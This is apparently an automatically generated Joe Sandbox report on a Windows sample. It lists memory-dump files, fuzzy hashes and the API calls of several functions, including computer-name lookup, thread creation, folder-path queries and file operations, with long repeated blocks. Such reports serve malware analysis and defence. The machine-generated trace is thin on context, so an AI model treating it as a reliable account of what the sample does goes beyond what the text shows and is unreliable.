                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                    • String ID: =
                                                                                                                                                                                                                                                    • API String ID: 3183270410-4144325766
                                                                                                                                                                                                                                                    • Opcode ID: 23487d5ba0a65d0d219d5b5478d2a8d49b6e8a848d1dcdbc5db7c1877a927828
                                                                                                                                                                                                                                                    • Instruction ID: 59e1dd7d6ce38e1716a23a5001d9d8654e17db1dfd09468b76dbf23451b0a208
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23487d5ba0a65d0d219d5b5478d2a8d49b6e8a848d1dcdbc5db7c1877a927828
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0B475600208BBDB20AB68EC49FEEB7B89B44704F410056F645DB180EEB4DD859B51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,?,?), ref: 00096EFE
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                                                                                                    • Opcode ID: 5d1491e95ee119c3c2822c5288b5a75edadef85775b39035a421b8abb1668e70
                                                                                                                                                                                                                                                    • Instruction ID: 20258dd5a1c7376969cbce26dc2db5613bf9ac70134264ae31a45e5f11089902
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d1491e95ee119c3c2822c5288b5a75edadef85775b39035a421b8abb1668e70
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02210372800218ABCF10EF95E8459EE7BB8FF40354F118126FD15A7212D735AA86DBA0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00081385), ref: 00090C91
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00081385), ref: 00090C98
                                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,00081385), ref: 00090CAC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4203777966-0
                                                                                                                                                                                                                                                    • Opcode ID: 6587dc4662c4ea271c807f27523e0e5d02053be23c3723aba2eccda8e4db3d96
                                                                                                                                                                                                                                                    • Instruction ID: ec6a3d2296a815101514ab8b902ac25ebb66082c42130ef9f96933aee2df34c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6587dc4662c4ea271c807f27523e0e5d02053be23c3723aba2eccda8e4db3d96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE08CB1204204BBF740AB99DC4DFCB76ACDB80715F000225F605D2250EAB889448720
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocLocal
                                                                                                                                                                                                                                                    • String ID: 1i
                                                                                                                                                                                                                                                    • API String ID: 3494564517-386612991
                                                                                                                                                                                                                                                    • Opcode ID: b4c3262e2bf6fa4b7f6e068cae7f93d0b3cdc944a5aa9c79c686f10ebdcf9cf3
                                                                                                                                                                                                                                                    • Instruction ID: 389801a4f0928a39a57a05587748f6f6748106b9ccebbb3387034d40924de169
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4c3262e2bf6fa4b7f6e068cae7f93d0b3cdc944a5aa9c79c686f10ebdcf9cf3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 58E02B36F017121FCF72092A98049B6BBDB9FC2FA4759412AFE48CB314D531CC0182E0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0009CBC9
                                                                                                                                                                                                                                                      • Part of subcall function 0009BB6C: lstrlenA.KERNEL32(?,0009CBDA,0009CC7C,00000000,06400000,00000003,00000000,0009757F,.exe,000B6C5C,000B6C58,000B6C54,000B6C50,000B6C4C,000B6C48,000B6C44), ref: 0009BB9E
                                                                                                                                                                                                                                                      • Part of subcall function 0009BB6C: malloc.MSVCRT ref: 0009BBA6
                                                                                                                                                                                                                                                      • Part of subcall function 0009BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0009BBB1
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0009CC06
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: malloc$lstrcpylstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2974738957-0
                                                                                                                                                                                                                                                    • Opcode ID: a45e7a8e5429ed24a864159083323a876f5c014ea9fc39af22a4b9f47688479f
                                                                                                                                                                                                                                                    • Instruction ID: a6f201782ef63c9cec62e8a63dd4d55fcd18ca63971cfa1999fce495759f272b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a45e7a8e5429ed24a864159083323a876f5c014ea9fc39af22a4b9f47688479f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F096B29052159BEF206F65ED45D5A7B94EB447B0F054111ED0897292DB30DC00A7B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9116eb677b7528a093caf24ab39d5018dcbae292368bb5b6d4138e1efa256935
                                                                                                                                                                                                                                                    • Instruction ID: 7fd9191d9befd6f9deca48ddd1d06023be9a9f1f71b361f95a97bb173c8a7580
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9116eb677b7528a093caf24ab39d5018dcbae292368bb5b6d4138e1efa256935
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D519372901A00ABCFF17BFD844AAF8B2D86F62314B158486F4548A333DF158D996F51
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1699248803-0
                                                                                                                                                                                                                                                    • Opcode ID: 4e8930e2ab3841962d2d91a71c00214243edc2ca20c05d22202a2c6b4591578f
                                                                                                                                                                                                                                                    • Instruction ID: 25879837e25d7b9e9ff72c842b8a10772fe4c447e7889ff283bf84b3da9ea0a5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e8930e2ab3841962d2d91a71c00214243edc2ca20c05d22202a2c6b4591578f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F01D71E10159ABDB15EF68DC559EEB7FCEB44200F0005A6A905D3141DA309F459B90
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SHFileOperationA.SHELL32(?), ref: 00092577
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
